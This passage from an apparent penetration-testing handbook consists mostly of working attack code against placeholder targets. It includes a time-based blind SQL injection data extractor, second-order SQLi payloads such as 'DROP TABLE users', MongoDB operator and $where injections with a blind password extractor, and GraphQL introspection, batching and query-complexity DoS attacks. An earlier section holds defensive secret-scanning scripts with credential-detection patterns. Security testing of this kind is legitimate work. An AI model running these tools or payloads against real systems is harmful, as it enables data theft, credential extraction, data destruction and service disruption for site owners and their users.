        """Stub: java.util.Random is a 48-bit LCG, predictable from two outputs"""
        return False
    
    def check_time_based(self, tokens):
        """Check if tokens are based on timestamps"""
        import time
        current_time = int(time.time())
        
        # Check if tokens contain recent timestamps
        for token in tokens:
            try:
                # Common patterns: timestamp in hex, base64, or decimal
                decoded = token
                if len(decoded) >= 8:
                    # Try to extract timestamp
                    possible_ts = int(decoded[:8], 16) if all(c in '0123456789abcdefABCDEF' 
                                                             for c in decoded[:8]) else 0
                    
                    if abs(current_time - possible_ts) < 86400:  # Within 24 hours
                        return True
            except:
                continue
        
        return False

# Usage
analyzer = RandomnessAnalyzer()
samples = analyzer.collect_samples("https://target.com/login", 500)
entropy_results = analyzer.analyze_entropy(samples)
bias_results = analyzer.test_for_bias(samples)
prng_type = analyzer.detect_prng_type(samples)

2.3 Secret Management Failures

Advanced Secret Scanning

#!/bin/bash
# Comprehensive secret scanning across multiple sources

TARGET_DIR="/path/to/codebase"
OUTPUT_FILE="secrets_report_$(date +%Y%m%d).json"

echo "[*] Starting comprehensive secret scan..."

# 1. TruffleHog with all detectors
trufflehog filesystem $TARGET_DIR \
  --no-verification \
  --json | jq . > trufflehog_raw.json

# 2. Gitleaks with custom configuration
cat > .gitleaks.toml << 'EOF'
title = "gitleaks config"
[[rules]]
description = "AWS Access Key"
regex = '''(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}'''
tags = ["key", "AWS"]

[[rules]]
description = "GitHub Token"
regex = '''gh[pousr]_[A-Za-z0-9_]{36,255}'''
tags = ["key", "GitHub"]

[[rules]]
description = "Generic API Key"
regex = '''(?i)(api[_-]?key|apikey|secret)[\s]*[=:][\s]*["']?[A-Za-z0-9]{16,64}["']?'''
tags = ["key", "API"]
EOF

gitleaks detect --source $TARGET_DIR \
  --config .gitleaks.toml \
  --report-format json \
  --report-path gitleaks_report.json

# 3. detect-secrets with baseline comparison
detect-secrets scan $TARGET_DIR \
  --all-files \
  --baseline .secrets.baseline

detect-secrets audit .secrets.baseline

# 4. Custom regex scanning for business-specific secrets
cat > custom_secrets.py << 'EOF'
import re
import os
import json

def scan_for_custom_secrets(directory):
    patterns = {
        "database_url": r"postgres(ql)?://[^:\s]+:[^@\s]+@[^\s]+",
        "jwt_secret": r"(?i)(jwt|access|refresh)[_-]?(secret|key)[\s]*[:=][\s]*['\"][A-Za-z0-9+/=]{32,}['\"]",
        "encryption_key": r"(?i)(encryption|aes|des|blowfish)[_-]?(key|iv)[\s]*[:=][\s]*['\"][A-Za-z0-9+/=]{16,}['\"]",
        "private_key": r"-----BEGIN (RSA|DSA|EC|OPENSSH) PRIVATE KEY-----",
        "oauth": r"[0-9a-f]{32}-[0-9a-f]{32}",
    }
    
    findings = []
    for root, dirs, files in os.walk(directory):
        for file in files:
            if file.endswith(('.py', '.js', '.java', '.php', '.rb', '.go', '.yml', '.yaml', '.json', '.env')):
                filepath = os.path.join(root, file)
                try:
                    with open(filepath, 'r', encoding='utf-8', errors='ignore') as f:
                        content = f.read()
                        for secret_type, pattern in patterns.items():
                            matches = re.finditer(pattern, content, re.IGNORECASE)
                            for match in matches:
                                # Get context (2 lines before and after)
                                lines = content.split('\n')
                                line_no = content[:match.start()].count('\n') + 1
                                context_start = max(0, line_no - 3)
                                context_end = min(len(lines), line_no + 2)
                                context = '\n'.join(lines[context_start:context_end])
                                
                                findings.append({
                                    "file": filepath,
                                    "line": line_no,
                                    "secret_type": secret_type,
                                    "match": match.group()[:50] + "..." if len(match.group()) > 50 else match.group(),
                                    "context": context
                                })
                except Exception as e:
                    continue
    
    return findings

if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "."
    print(json.dumps(scan_for_custom_secrets(target), indent=2))
EOF

python3 custom_secrets.py "$TARGET_DIR" > custom_findings.json

# 5. Historical secret scanning in git
git log -p | grep -E "(pass|secret|key|token|auth)" > git_history_secrets.txt

# 6. Combine all findings (the three reports differ in shape - trufflehog
# emits JSON lines, gitleaks an array - so normalize before merging in practice)
jq -s 'add' trufflehog_raw.json gitleaks_report.json custom_findings.json > $OUTPUT_FILE

echo "[+] Secret scanning complete. Report saved to $OUTPUT_FILE"

AWS Secret Scanning & Remediation

#!/usr/bin/env python3
"""
AWS Secret Scanner - Find exposed AWS credentials
"""
import boto3
import re
import json
from datetime import datetime
from botocore.exceptions import ClientError

class AWSSecretScanner:
    def __init__(self, aws_profile='default'):
        self.session = boto3.Session(profile_name=aws_profile)
        self.iam = self.session.client('iam')
        self.sts = self.session.client('sts')
        
    def scan_for_exposed_keys(self):
        """Scan for potentially exposed AWS keys"""
        findings = []
        
        # 1. List all IAM users
        users = self.iam.list_users()
        
        for user in users['Users']:
            username = user['UserName']
            
            # 2. Get access keys for each user
            try:
                keys = self.iam.list_access_keys(UserName=username)
                
                for key in keys['AccessKeyMetadata']:
                    key_id = key['AccessKeyId']
                    status = key['Status']
                    create_date = key['CreateDate']
                    
                    # 3. Check key age
                    key_age = (datetime.now() - create_date.replace(tzinfo=None)).days
                    
                    # 4. Check last used
                    try:
                        last_used = self.iam.get_access_key_last_used(AccessKeyId=key_id)
                        last_used_date = last_used['AccessKeyLastUsed'].get('LastUsedDate')
                        
                        if last_used_date:
                            days_since_use = (datetime.now() - last_used_date.replace(tzinfo=None)).days
                        else:
                            days_since_use = key_age
                    except:
                        days_since_use = key_age
                    
                    # 5. Check for rotation policy violation
                    if key_age > 90:  # 90-day rotation policy
                        findings.append({
                            'severity': 'HIGH',
                            'user': username,
                            'key_id': key_id,
                            'issue': f'Access key not rotated in {key_age} days',
                            'key_age_days': key_age,
                            'last_used_days': days_since_use
                        })
                    
                    # 6. Check for unused keys
                    if days_since_use > 180:
                        findings.append({
                            'severity': 'MEDIUM',
                            'user': username,
                            'key_id': key_id,
                            'issue': f'Access key unused for {days_since_use} days',
                            'key_age_days': key_age,
                            'last_used_days': days_since_use
                        })
            
            except ClientError as e:
                print(f"Error checking keys for {username}: {e}")
        
        return findings
    
    def check_key_exposure(self, key_id, secret_key):
        """Check if key is exposed (simulated - would use internal checks)"""
        # In reality, this would check internal logs, GitHub, etc.
        # For demo, we'll simulate
        exposed_indicators = [
            'Commit history',
            'Public repository',
            'Log files',
            'Environment variables in screenshots'
        ]
        
        return {
            'key_id': key_id,
            'exposed': False,  # Placeholder
            'indicators': []
        }
    
    def generate_remediation(self, findings):
        """Generate remediation steps"""
        remediation = []
        
        for finding in findings:
            if finding['severity'] == 'HIGH':
                remediation.append({
                    'action': f"Rotate access key {finding['key_id']} for user {finding['user']}",
                    'steps': [
                        f"Create new access key for {finding['user']}",
                        f"Update applications using {finding['key_id']}",
                        f"Disable {finding['key_id']} after migration",
                        f"Delete {finding['key_id']} after 7 days"
                    ]
                })
        
        return remediation

# Usage
scanner = AWSSecretScanner('production')
findings = scanner.scan_for_exposed_keys()
remediation = scanner.generate_remediation(findings)

print(json.dumps(findings, indent=2, default=str))

Chapter 3: Injection Attacks - Modern Techniques

3.1 Advanced SQL Injection

Time-Based Blind SQLi Automation

#!/usr/bin/env python3
"""
Advanced Time-Based Blind SQL Injection Exploitation
Supports multiple databases with conditional timing
"""
import requests
import time
from urllib.parse import quote
from concurrent.futures import ThreadPoolExecutor, as_completed

class TimeBasedSQLi:
    def __init__(self, target_url, param_name, injection_point):
        self.target_url = target_url
        self.param_name = param_name
        self.injection_point = injection_point
        self.delay = 5  # Base delay in seconds
        self.threshold = 0.5  # Time difference threshold
        self.session = requests.Session()
        
        # Database-specific payloads
        self.db_payloads = {
            'mysql': {
                'true': f"SLEEP({self.delay})",
                'false': f"SLEEP(0)",
                'conditional': f"IF({{condition}},SLEEP({self.delay}),SLEEP(0))"
            },
            'postgresql': {
                'true': f"pg_sleep({self.delay})",
                'false': f"pg_sleep(0)",
                'conditional': f"CASE WHEN {{condition}} THEN pg_sleep({self.delay}) ELSE pg_sleep(0) END"
            },
            'mssql': {
                'true': f"WAITFOR DELAY '0:0:{self.delay}'",
                'false': f"WAITFOR DELAY '0:0:0'",
                'conditional': f"; IF {{condition}} WAITFOR DELAY '0:0:{self.delay}'--"
            },
            'oracle': {
                'true': f"dbms_pipe.receive_message('a',{self.delay})",
                'false': f"dbms_pipe.receive_message('a',0)",
                'conditional': f"BEGIN IF {{condition}} THEN dbms_pipe.receive_message('a',{self.delay}); ELSE dbms_pipe.receive_message('a',0); END IF; END;"
            }
        }
    
    def detect_database(self):
        """Identify the database type"""
        detected_db = None
        
        for db_type, payloads in self.db_payloads.items():
            payload = f"' OR {payloads['true']}--"
            test_url = self.build_url(payload)
            
            start_time = time.time()
            try:
                response = self.session.get(test_url, timeout=self.delay + 2)
                elapsed = time.time() - start_time
                
                if elapsed >= self.delay - self.threshold:
                    detected_db = db_type
                    break
            except:
                continue
        
        return detected_db
    
    def condition_is_true(self, condition, db_type):
        """Send one conditional payload and infer truth from response time"""
        # NB: this single framing suits expression-style payloads (MySQL,
        # Postgres); stacked-query payloads like the MSSQL one need their
        # own wrapper
        payload = self.db_payloads[db_type]['conditional'].format(condition=condition)
        injection = f"' OR {payload}--"
        test_url = self.build_url(injection)
        start_time = time.time()
        try:
            self.session.get(test_url, timeout=self.delay + 2)
        except requests.exceptions.ReadTimeout:
            return True  # the injected delay firing can surface as a timeout
        except Exception as e:
            print(f"Error: {e}")
            return False
        return (time.time() - start_time) >= self.delay - self.threshold
    
    def extract_data(self, query, db_type):
        """Extract data character by character via binary search on ASCII codes"""
        result = ""
        position = 1
        
        while True:
            # Stop when no character exists at this position
            # (ASCII() of an empty substring yields 0/NULL)
            if not self.condition_is_true(
                    f"ASCII(SUBSTRING(({query}),{position},1)) > 0", db_type):
                break
            
            # Binary search the printable ASCII range 32..126; the invariant
            # is that the target code stays within [low, high]
            low, high = 32, 126
            while low < high:
                mid = (low + high) // 2
                if self.condition_is_true(
                        f"ASCII(SUBSTRING(({query}),{position},1)) > {mid}", db_type):
                    low = mid + 1
                else:
                    high = mid
            
            result += chr(low)
            print(f"[+] Found: {result}")
            position += 1
        
        return result
    
    def parallel_extraction(self, queries, db_type, max_workers=5):
        """Extract multiple pieces of data in parallel"""
        results = {}
        
        with ThreadPoolExecutor(max_workers=max_workers) as executor:
            future_to_query = {
                executor.submit(self.extract_data, query, db_type): query 
                for query in queries
            }
            
            for future in as_completed(future_to_query):
                query = future_to_query[future]
                try:
                    data = future.result()
                    results[query] = data
                except Exception as e:
                    results[query] = f"Error: {e}"
        
        return results
    
    def build_url(self, payload):
        """Construct the target URL with injection"""
        # Handle different injection points
        if self.injection_point == 'query':
            return f"{self.target_url}?{self.param_name}={quote(payload)}"
        elif self.injection_point == 'cookie':
            # Return session with modified cookie
            self.session.cookies.set(self.param_name, payload)
            return self.target_url
        else:
            return self.target_url.replace('INJECTION_POINT', quote(payload))

# Usage example
sqli = TimeBasedSQLi(
    target_url="http://target.com/search",
    param_name="q",
    injection_point="query"
)

# Detect database
db_type = sqli.detect_database()
print(f"[*] Detected database: {db_type}")

# Extract data
queries = [
    "SELECT user()",
    "SELECT database()",
    "SELECT @@version",
    "SELECT table_name FROM information_schema.tables LIMIT 5"
]

results = sqli.parallel_extraction(queries, db_type)
for query, result in results.items():
    print(f"[*] {query}: {result}")

Second-Order SQL Injection Detection
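The pattern under test, reduced to a few lines: the write is parameterized and looks safe, but the stored value is later concatenated into a second query. A runnable sqlite3 illustration (schema and payload contrived for the demo):

import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (email TEXT)")
conn.execute("CREATE TABLE orders (owner TEXT, item TEXT)")
conn.execute("INSERT INTO orders VALUES ('alice', 'laptop')")

# First-order write: parameterized, so nothing fires at insertion time
payload = "x' UNION SELECT email FROM users--"
conn.execute("INSERT INTO users (email) VALUES (?)", (payload,))

# Second-order read: the stored value is trusted and concatenated unsafely
stored = conn.execute("SELECT email FROM users").fetchone()[0]
rows = conn.execute(f"SELECT item FROM orders WHERE owner = '{stored}'").fetchall()
print(rows)  # the payload executes now, leaking users.email rows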

#!/usr/bin/env python3
"""
Second-Order SQL Injection Detection
Tests for stored/triggered SQL injection attacks
"""
import requests
import time
from urllib.parse import urljoin

class SecondOrderSQLiDetector:
    def __init__(self, base_url, session_cookies=None):
        self.base_url = base_url
        self.session = requests.Session()
        if session_cookies:
            self.session.cookies.update(session_cookies)
        
        self.payloads = [
            # Classic second-order payloads
            "admin'--",
            "admin' OR '1'='1",
            "test'; DROP TABLE users--",
            
            # Time-based for detection
            "test'; WAITFOR DELAY '0:0:5'--",
            "test' AND SLEEP(5)--",
            
            # Error-based
            "test' AND 1=CONVERT(int, @@version)--",
            
            # Union-based (for when triggered)
            "test' UNION SELECT NULL--"
        ]
    
    def test_registration_flow(self):
        """Test user registration -> login flow"""
        findings = []
        
        for payload in self.payloads:
            print(f"[*] Testing payload: {payload}")
            
            # 1. Register with malicious payload
            reg_data = {
                'username': f'test_{int(time.time())}',
                'email': f'{payload}@test.com',
                'password': 'Password123!'
            }
            
            reg_response = self.session.post(
                urljoin(self.base_url, '/register'),
                data=reg_data
            )
            
            if reg_response.status_code == 200:
                # 2. Attempt login (might trigger second-order)
                login_data = {
                    'email': f'{payload}@test.com',
                    'password': 'Password123!'
                }
                
                start_time = time.time()
                login_response = self.session.post(
                    urljoin(self.base_url, '/login'),
                    data=login_data
                )
                elapsed = time.time() - start_time
                
                # 3. Analyze response
                if elapsed > 5:  # Time-based detection
                    findings.append({
                        'type': 'time_based',
                        'payload': payload,
                        'delay': elapsed,
                        'vector': 'registration->login'
                    })
                
                if 'error' in login_response.text.lower() and 'sql' in login_response.text.lower():
                    findings.append({
                        'type': 'error_based',
                        'payload': payload,
                        'response_snippet': login_response.text[:200],
                        'vector': 'registration->login'
                    })
            
            time.sleep(1)  # Rate limiting
        
        return findings
    
    def test_profile_update(self):
        """Test profile update -> display flow"""
        findings = []
        
        # First, create a normal user
        user_data = {
            'username': f'victim_{int(time.time())}',
            'email': 'victim@test.com',
            'password': 'Password123!'
        }
        
        self.session.post(
            urljoin(self.base_url, '/register'),
            data=user_data
        )
        
        # Login
        self.session.post(
            urljoin(self.base_url, '/login'),
            data={'email': 'victim@test.com', 'password': 'Password123!'}
        )
        
        # Update profile with malicious payload
        for payload in self.payloads:
            update_data = {
                'display_name': payload,
                'bio': f'Bio with {payload}'
            }
            
            update_response = self.session.post(
                urljoin(self.base_url, '/profile/update'),
                data=update_data
            )
            
            if update_response.status_code == 200:
                # View profile (might trigger second-order)
                start_time = time.time()
                profile_response = self.session.get(
                    urljoin(self.base_url, '/profile')
                )
                elapsed = time.time() - start_time
                
                if elapsed > 5:
                    findings.append({
                        'type': 'time_based',
                        'payload': payload,
                        'delay': elapsed,
                        'vector': 'profile_update->display'
                    })
                
                if any(err in profile_response.text.lower() 
                      for err in ['sql', 'database', 'syntax']):
                    findings.append({
                        'type': 'error_based',
                        'payload': payload,
                        'vector': 'profile_update->display'
                    })
        
        return findings
    
    def automated_detection(self):
        """Run all second-order SQLi tests"""
        all_findings = []
        
        print("[*] Testing registration -> login flow")
        all_findings.extend(self.test_registration_flow())
        
        print("[*] Testing profile update -> display flow")
        all_findings.extend(self.test_profile_update())
        
        # Additional test vectors
        test_vectors = [
            ('/comment', 'content', '/comments'),  # Comment -> display
            ('/product/review', 'review', '/product'),  # Review -> product page
            ('/ticket/create', 'description', '/ticket/view')  # Ticket create -> view
        ]
        
        for create_endpoint, param_name, trigger_endpoint in test_vectors:
            print(f"[*] Testing {create_endpoint} -> {trigger_endpoint}")
            findings = self.test_generic_flow(create_endpoint, param_name, trigger_endpoint)
            all_findings.extend(findings)
        
        return all_findings
    
    def test_generic_flow(self, create_endpoint, param_name, trigger_endpoint):
        """Test a generic create -> trigger flow"""
        findings = []
        
        for payload in self.payloads[:3]:  # Test first 3 payloads
            # Create resource with payload
            data = {param_name: payload, 'title': 'Test'}
            create_response = self.session.post(
                urljoin(self.base_url, create_endpoint),
                data=data
            )
            
            if create_response.status_code in [200, 201]:
                # Trigger the second-order
                start_time = time.time()
                trigger_response = self.session.get(
                    urljoin(self.base_url, trigger_endpoint)
                )
                elapsed = time.time() - start_time
                
                if elapsed > 5:
                    findings.append({
                        'type': 'time_based',
                        'payload': payload,
                        'delay': elapsed,
                        'vector': f'{create_endpoint}->{trigger_endpoint}'
                    })
        
        return findings

# Usage
detector = SecondOrderSQLiDetector("http://target.com")
findings = detector.automated_detection()

for finding in findings:
    print(f"[!] Found second-order SQLi: {finding}")

3.2 Advanced NoSQL Injection Techniques

MongoDB Injection Beyond $where

#!/usr/bin/env python3
"""
Advanced MongoDB NoSQL Injection Testing
Covers aggregation pipelines, $function, MapReduce, etc.
"""
import requests
import json
import time
from urllib.parse import quote

class MongoDBInjector:
    def __init__(self, target_url, param_name='query'):
        self.target_url = target_url
        self.param_name = param_name
        self.session = requests.Session()
        
        # Advanced MongoDB payloads
        self.payloads = {
            'authentication_bypass': [
                # Classic
                '{"$ne": null}',
                '{"$gt": ""}',
                '{"$regex": ".*"}',
                
                # Using $where with JavaScript
                '{"$where": "true"}',
                '{"$where": "1 == 1"}',
                
                # Using $expr
                '{"$expr": {"$eq": [1, 1]}}',
            ],
            
            'data_extraction': [
                # Extract all documents
                '{"$where": "this.username == \\\"admin\\\""}',
                
                # Using $function in aggregation
                '{"$function": "function() { return this.password; }"}',
                
                # MapReduce injection
                '{"map": "function() { emit(this.username, this.password); }"}',
            ],
            
            'javascript_execution': [
                # Direct JavaScript execution
                '{"$where": "sleep(5000) || true"}',
                '{"$where": "d = new Date(); do {cur = new Date();} while(cur - d < 5000)"}',
                
                # Using $function with sleep
                '{"$function": "function() { var d = new Date(); while(new Date() - d < 5000) {}; return true; }"}',
            ],
            
            'aggregation_pipeline': [
                # Malicious aggregation stages
                '[{"$match": {"username": {"$ne": null}}}, {"$project": {"password": 1}}]',
                
                # Using $addFields to leak data
                '[{"$addFields": {"leaked": "$password"}}]',
                
                # $lookup with malicious pipeline
                '[{"$lookup": {"from": "users", "pipeline": [{"$project": {"password": 1}}], "as": "leaked"}}]',
            ]
        }
    
    def test_injection_point(self, method='GET', data_type='json'):
        """Test for NoSQL injection vulnerabilities"""
        vulnerabilities = []
        
        for category, payload_list in self.payloads.items():
            for payload in payload_list:
                print(f"[*] Testing {category}: {payload[:50]}...")
                
                if method.upper() == 'GET':
                    # URL encode for GET
                    test_url = f"{self.target_url}?{self.param_name}={quote(payload)}"
                    response = self.session.get(test_url)
                else:
                    # POST with different content types
                    if data_type == 'json':
                        headers = {'Content-Type': 'application/json'}
                        data = json.dumps({self.param_name: json.loads(payload)})
                    else:  # form data
                        headers = {'Content-Type': 'application/x-www-form-urlencoded'}
                        data = {self.param_name: payload}
                    
                    response = self.session.post(
                        self.target_url,
                        data=data,
                        headers=headers
                    )
                
                # Analyze response
                if self.is_successful_injection(response, category):
                    vulnerabilities.append({
                        'category': category,
                        'payload': payload,
                        'status_code': response.status_code,
                        'response_time': response.elapsed.total_seconds(),
                        'indicators': self.extract_indicators(response)
                    })
        
        return vulnerabilities
    
    def is_successful_injection(self, response, category):
        """Determine if injection was successful"""
        indicators = {
            'authentication_bypass': [
                response.status_code in [200, 302],
                'logout' in response.text,
                'Welcome' in response.text,
                'Invalid credentials' not in response.text
            ],
            
            'data_extraction': [
                'password' in response.text.lower(),
                'email' in response.text.lower(),
                'admin' in response.text,
                len(response.json()) > 0 if self.is_json(response) else False
            ],
            
            'javascript_execution': [
                response.elapsed.total_seconds() > 5,
                'timeout' in response.text.lower()
            ]
        }
        
        if category in indicators:
            return any(indicators[category])
        
        return False
    
    def is_json(self, response):
        """Best-effort check that the response body parses as JSON"""
        try:
            response.json()
            return True
        except ValueError:
            return False
    
    def extract_indicators(self, response):
        """Collect simple evidence snippets from a suspicious response"""
        markers = ['password', 'email', 'admin', 'token']
        return [m for m in markers if m in response.text.lower()]
    
    def blind_injection(self):
        """Extract data character-by-character via time-based blind NoSQL injection"""
        extracted_data = ""
        charset = "abcdefghijklmnopqrstuvwxyz0123456789"
        
        for i in range(1, 50):  # Extract up to 50 characters
            found_char = None
            
            for char in charset:
                # Sleep only when the character at position i matches, turning
                # the boolean oracle into a measurable delay. Single quotes keep
                # the embedded JSON valid.
                condition = f"this.password.charAt({i-1}) == '{char}' && sleep(2000)"
                payload = f'{{"$where": "{condition}"}}'
                
                start_time = time.time()
                response = self.session.post(
                    self.target_url,
                    json={'query': json.loads(payload)},
                    timeout=10
                )
                elapsed = time.time() - start_time
                
                # A delay near the injected sleep() means the condition matched
                if elapsed > 2:  # Threshold for time-based
                    found_char = char
                    extracted_data += char
                    print(f"[+] Found char {i}: {char}")
                    break
            
            if not found_char:
                break
        
        return extracted_data
    
    def test_operator_injection(self):
        """Test for MongoDB operator injection"""
        operators = [
            # Comparison
            '$eq', '$ne', '$gt', '$gte', '$lt', '$lte', '$in', '$nin',
            # Logical
            '$and', '$or', '$not', '$nor',
            # Element
            '$exists', '$type',
            # Evaluation
            '$expr', '$jsonSchema', '$mod', '$regex', '$text', '$where',
            # Geospatial
            '$geoIntersects', '$geoWithin', '$near', '$nearSphere',
            # Array
            '$all', '$elemMatch', '$size',
            # Bitwise
            '$bitsAllClear', '$bitsAllSet', '$bitsAnyClear', '$bitsAnySet'
        ]
        
        vulnerabilities = []
        
        for operator in operators:
            # Test if operator can be injected
            payload = f'{{"{operator}": [1, 1]}}'
            
            response = self.session.post(
                self.target_url,
                json={'filter': json.loads(payload)}
            )
            
            # Check if operator was processed
            if response.status_code == 200:
                try:
                    data = response.json()
                    # Look for signs of operator execution
                    if data and len(data) > 0:
                        vulnerabilities.append({
                            'operator': operator,
                            'payload': payload,
                            'result_count': len(data)
                        })
                except ValueError:
                    pass
        
        return vulnerabilities

# Usage
injector = MongoDBInjector("http://target.com/api/users")
vulns = injector.test_injection_point(method='POST', data_type='json')

for vuln in vulns:
    print(f"[!] Vulnerability found: {vuln['category']}")

GraphQL Injection Techniques

#!/usr/bin/env python3
"""
GraphQL Injection Testing Framework
Includes introspection abuse, query batching, and persisted query attacks
"""
import requests
import json

class GraphQLInjector:
    def __init__(self, endpoint, headers=None):
        self.endpoint = endpoint
        self.headers = headers or {'Content-Type': 'application/json'}
        self.session = requests.Session()
        
    def introspection_abuse(self):
        """Abuse GraphQL introspection to gather schema information"""
        introspection_query = """
        query IntrospectionQuery {
          __schema {
            types {
              name
              kind
              description
              fields {
                name
                description
                type {
                  name
                  kind
                  ofType { name kind }
                }
                args {
                  name
                  description
                  type { name kind ofType { name kind } }
                  defaultValue
                }
              }
            }
          }
        }
        """
        
        response = self.session.post(
            self.endpoint,
            json={'query': introspection_query},
            headers=self.headers
        )
        
        if response.status_code == 200:
            schema = response.json()
            
            # Extract sensitive fields
            sensitive_fields = self.find_sensitive_fields(schema)
            
            # Generate malicious queries based on schema
            malicious_queries = self.generate_malicious_queries(schema)
            
            return {
                'schema_obtained': True,
                'raw_schema': schema,  # keep the full schema for downstream tests
                'sensitive_fields': sensitive_fields,
                'malicious_queries': malicious_queries[:5]  # First 5
            }
        
        return {'schema_obtained': False}
    
    def find_sensitive_fields(self, schema):
        """Identify potentially sensitive fields in schema"""
        sensitive_keywords = [
            'password', 'email', 'token', 'secret', 'key',
            'credit', 'card', 'ssn', 'address', 'phone',
            'admin', 'role', 'permission', 'salary', 'private'
        ]
        
        sensitive = []
        for type_info in schema.get('data', {}).get('__schema', {}).get('types', []):
            if type_info.get('fields'):
                for field in type_info['fields']:
                    field_name = (field.get('name') or '').lower()
                    # description is frequently null in introspection output
                    field_desc = (field.get('description') or '').lower()
                    
                    if any(keyword in field_name or keyword in field_desc 
                          for keyword in sensitive_keywords):
                        sensitive.append({
                            'type': type_info['name'],
                            'field': field['name'],
                            'description': field.get('description', '')
                        })
        
        return sensitive
    
    def generate_malicious_queries(self, schema):
        """Generate potentially malicious queries based on schema"""
        queries = []
        
        # 1. Query for all data
        for type_info in schema.get('data', {}).get('__schema', {}).get('types', []):
            if type_info.get('fields') and not type_info['name'].startswith('__'):
                # Build query to get all fields of this type
                fields = [field['name'] for field in type_info['fields']]
                query = f"query {{ {type_info['name'].lower()} {{ {' '.join(fields)} }} }}"
                queries.append(query)
        
        # 2. Nested queries (depth exploitation)
        queries.append("""
        query {
          users {
            id
            email
            posts {
              id
              content
              comments {
                id
                content
                author {
                  id
                  email
                }
              }
            }
          }
        }
        """)
        
        # 3. Batch queries (query batching attack)
        batch_query = []
        for i in range(100):
            batch_query.append({
                'query': 'query { __typename }'
            })
        
        queries.append(json.dumps(batch_query))
        
        return queries
    
    def test_query_complexity(self):
        """Test for query complexity/DoS vulnerabilities"""
        # Very deep query
        deep_query = "query { " + "a { " * 100 + "__typename" + " }" * 100 + " }"
        
        # Very wide query
        wide_query = "query { " + " ".join([f"field{i}: __typename" for i in range(1000)]) + " }"
        
        queries = [
            ('deep', deep_query),
            ('wide', wide_query)
        ]
        
        results = []
        for name, query in queries:
            try:
                response = self.session.post(
                    self.endpoint,
                    json={'query': query},
                    headers=self.headers,
                    timeout=30
                )
                
                results.append({
                    'test': name,
                    'status_code': response.status_code,
                    'response_time': response.elapsed.total_seconds(),
                    'error': 'timeout' if response.elapsed.total_seconds() > 29 else None
                })
            except requests.exceptions.Timeout:
                results.append({
                    'test': name,
                    'status_code': 'TIMEOUT',
                    'response_time': 30,
                    'error': 'timeout'
                })
        
        return results
    
    def test_persisted_query_injection(self):
        """Test for persisted query attacks"""
        # Try to guess query IDs
        query_ids = []
        
        for i in range(1000):
            # Common patterns for persisted query IDs
            patterns = [
                f"{i:08x}",  # Hex
                f"{i}",      # Decimal
                f"q{i:04d}", # q0001 format
            ]
            
            for pattern in patterns:
                response = self.session.post(
                    self.endpoint,
                    json={'queryId': pattern},
                    headers=self.headers
                )
                
                if response.status_code == 200:
                    data = response.json()
                    if 'data' in data and not data.get('errors'):
                        query_ids.append({
                            'id': pattern,
                            'response': data.get('data', {})
                        })
        
        return query_ids
    
    def test_field_duplication(self):
        """Test GraphQL field duplication attacks"""
        # Some GraphQL implementations process duplicate fields multiple times
        query = """
        query {
          user(id: "1") {
            email
            email
            email
            email
            email
          }
        }
        """
        
        response = self.session.post(
            self.endpoint,
            json={'query': query},
            headers=self.headers
        )
        
        if response.status_code == 200:
            # Python's JSON parser collapses duplicate keys, so inspect the
            # raw body instead: a server that resolved the field five times
            # will repeat "email" in its response
            duplicate_count = response.text.count('"email"')
            if duplicate_count > 1:
                return {
                    'vulnerable': True,
                    'duplicate_count': duplicate_count,
                    'response_preview': response.text[:200]
                }
        
        return {'vulnerable': False}
    
    def automated_injection_test(self):
        """Run all GraphQL injection tests"""
        results = {}
        
        print("[*] Testing introspection access")
        results['introspection'] = self.introspection_abuse()
        
        print("[*] Testing query complexity limits")
        results['complexity'] = self.test_query_complexity()
        
        print("[*] Testing persisted query attacks")
        results['persisted_queries'] = self.test_persisted_query_injection()
        
        print("[*] Testing field duplication")
        results['field_duplication'] = self.test_field_duplication()
        
        # Test for SQL injection through GraphQL arguments
        print("[*] Testing SQL injection in GraphQL arguments")
        results['sqli'] = self.test_graphql_sqli()
        
        return results
    
    def test_graphql_sqli(self):
        """Test for SQL injection in GraphQL arguments"""
        sqli_payloads = [
            "' OR '1'='1",
            "admin'--",
            "1; DROP TABLE users--",
            "1' AND SLEEP(5)--"
        ]
        
        vulnerable_endpoints = []
        
        # Get schema first to know what queries are available
        result = self.introspection_abuse()
        
        if result.get('schema_obtained'):
            schema = result['raw_schema']
            # Look for queries with string arguments
            types = schema.get('data', {}).get('__schema', {}).get('types', [])
            for type_info in types:
                if type_info.get('fields'):
                    for field in type_info['fields']:
                        if field.get('args'):
                            for arg in field['args']:
                                arg_type = arg.get('type', {}).get('name', '')
                                if arg_type == 'String':
                                    # Test this argument
                                    query = f"""
                                    query {{
                                      {field['name']}({arg['name']}: "PAYLOAD") {{
                                        id
                                      }}
                                    }}
                                    """
                                    
                                    for payload in sqli_payloads:
                                        test_query = query.replace('PAYLOAD', payload)
                                        
                                        response = self.session.post(
                                            self.endpoint,
                                            json={'query': test_query},
                                            headers=self.headers,
                                            timeout=10
                                        )
                                        
                                        if response.status_code == 200:
                                            data = response.json()
                                            errors = data.get('errors', [])
                                            
                                            # Check for SQL errors
                                            if any('sql' in str(error).lower() or 
                                                   'syntax' in str(error).lower() 
                                                   for error in errors):
                                                vulnerable_endpoints.append({
                                                    'query': field['name'],
                                                    'argument': arg['name'],
                                                    'payload': payload,
                                                    'error': str(errors[0])[:200]
                                                })
        
        return vulnerable_endpoints

# Usage
gql = GraphQLInjector("http://target.com/graphql", 
                      headers={'Authorization': 'Bearer token'})

results = gql.automated_injection_test()
print(json.dumps(results, indent=2))
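
One gap worth closing by hand: generate_malicious_queries builds a 100-element batch, but the framework above never actually submits it. A quick standalone probe for whether an endpoint honors array-batched queries (the endpoint URL below is a placeholder) might look like this:

import requests

def accepts_query_batching(endpoint, n=10):
    """POST an n-element JSON array of trivial queries; a server that
    supports batching answers with a same-length array of results."""
    batch = [{"query": "query { __typename }"} for _ in range(n)]
    resp = requests.post(endpoint, json=batch, timeout=10)
    try:
        body = resp.json()
    except ValueError:
        return False
    return isinstance(body, list) and len(body) == n

if accepts_query_batching("http://target.com/graphql"):
    print("[!] Endpoint processes batched queries (brute-force/DoS amplification)")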

3.3 Command Injection Evolution

Advanced Command Injection with Filter Bypass

#!/usr/bin/env python3
"""
Advanced Command Injection Techniques with Filter Bypass
Includes encoding, whitespace variations, and command chaining
"""
import requests
import time

class CommandInjector:
    def __init__(self, target_url, vulnerable_param):
        self.target_url = target_url
        self.vulnerable_param = vulnerable_param
        self.session = requests.Session()
        
        # Command injection payloads with various bypass techniques
        self.payloads = {
